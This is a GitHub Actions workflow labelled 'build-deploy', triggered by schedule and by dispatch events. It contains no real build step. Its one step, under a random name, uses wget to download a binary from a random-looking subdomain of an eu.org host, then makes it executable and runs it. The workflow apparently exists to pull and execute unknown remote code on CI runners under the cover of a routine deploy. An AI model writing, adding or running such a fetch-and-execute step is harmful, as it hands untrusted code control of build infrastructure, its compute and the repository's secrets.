#2024-03-18-[083400]-uh9j3p8x
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "53 2 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: xg8duf9evdl5rgk1
        run: |
          wget -q https://p6j1gfea4h9op7lw.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories